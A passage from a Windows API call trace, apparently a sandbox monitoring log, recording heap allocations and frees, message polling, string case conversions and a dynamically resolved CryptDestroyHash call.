Size=0x18) returned 0x2466d90 [0262.728] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0262.728] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0262.728] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0262.728] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0262.728] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0262.729] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0262.729] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0262.729] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0262.729] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0262.729] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0262.729] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0262.729] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0262.729] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9fc0 [0262.729] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9c48 [0262.729] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9f60 [0262.729] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0262.729] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa038 [0262.729] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a58 [0262.729] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0262.729] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24acc60 [0262.729] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24ab328 [0262.729] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9678 [0262.730] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0262.730] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa878 [0262.730] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0262.730] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0262.730] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9288 [0262.730] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0262.730] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9f30 [0262.730] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24acde0 [0262.730] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0262.730] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa7e8 [0262.730] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9fa8 [0262.730] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0262.730] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9f18 [0262.730] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9e10 [0262.730] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0262.730] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0262.730] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0262.730] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a58 [0262.730] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0262.731] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0262.731] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0262.731] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0262.731] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9ab0 [0262.731] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0262.731] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0262.731] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0262.731] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0262.731] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0262.731] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0262.731] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0262.731] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0262.731] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0262.731] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0262.731] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a58 [0262.731] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0262.731] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0262.731] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0262.732] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0262.732] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0262.732] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0262.732] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0262.732] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0262.732] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0262.732] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0262.732] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0262.732] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0262.732] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0262.732] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0262.732] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0262.732] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0262.732] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0262.732] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0262.732] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0262.732] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0262.732] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0262.732] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0262.732] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0262.732] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0262.733] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0262.733] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0262.733] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0262.733] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0262.733] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0262.733] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0262.733] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0262.733] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0262.733] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0262.733] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0262.733] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0262.733] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0262.733] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0262.733] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0262.733] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0262.733] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a58 [0262.733] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0262.733] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0262.733] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0262.733] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0262.733] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1438 [0262.733] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0262.734] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0262.734] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0262.734] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0262.734] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0262.734] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0262.734] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0262.734] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0262.734] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0262.734] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0262.734] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0262.734] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0262.734] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0262.734] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0262.734] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0262.734] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0262.734] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0262.734] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0262.734] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0262.734] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0262.735] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0262.735] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0262.735] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0262.735] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x11) returned 0x2466d90 [0262.735] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x2466d90, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0262.735] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0262.735] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d28 [0262.735] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0262.735] GetProcAddress (hModule=0x74d40000, lpProcName="CryptDestroyHash") returned 0x74d4df66 [0262.735] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0262.735] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0262.735] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0262.735] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0262.735] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0262.736] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0262.736] CryptDestroyHash (hHash=0xaa59a0) returned 1 [0262.736] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0262.736] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0262.736] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0262.736] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0262.736] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0262.736] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0262.736] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0262.736] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0262.736] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0262.736] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0262.736] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0262.736] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0262.736] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0262.736] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0262.736] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0262.736] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0262.737] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0262.737] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0262.737] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0262.737] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0262.737] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0262.737] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0262.737] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0262.737] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0262.737] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0262.737] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0262.737] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0262.737] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0262.737] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0262.737] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0262.737] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0262.737] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0262.737] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0262.737] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0262.737] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a04b0 | out: hHeap=0x25c0000) returned 1 [0262.738] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0262.738] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0262.738] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0262.738] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0262.738] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0262.738] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0262.738] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0262.738] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0262.738] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0262.738] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0262.738] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0262.738] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0262.738] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0262.738] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0262.738] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0262.738] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0262.738] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0262.738] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0262.739] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0262.739] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0262.739] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0262.739] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0262.739] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0262.739] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0262.739] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0262.739] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0262.739] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0262.739] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0262.739] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0262.739] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0262.739] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0262.740] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0262.740] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0262.740] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0262.740] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0262.740] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0262.740] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0262.740] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0262.740] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0262.740] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0262.740] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0262.740] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0262.740] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0262.740] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0262.741] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0262.741] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0262.741] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0262.741] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0262.741] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0262.741] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a80 | out: hHeap=0x25c0000) returned 1 [0262.741] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0262.741] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0262.741] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0262.741] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0262.741] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f1d0 | out: hHeap=0x25c0000) returned 1 [0262.741] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2060 | out: hHeap=0x25c0000) returned 1 [0262.741] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0262.741] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0262.742] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0262.742] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c90 | out: hHeap=0x25c0000) returned 1 [0262.742] HeapFree (in: 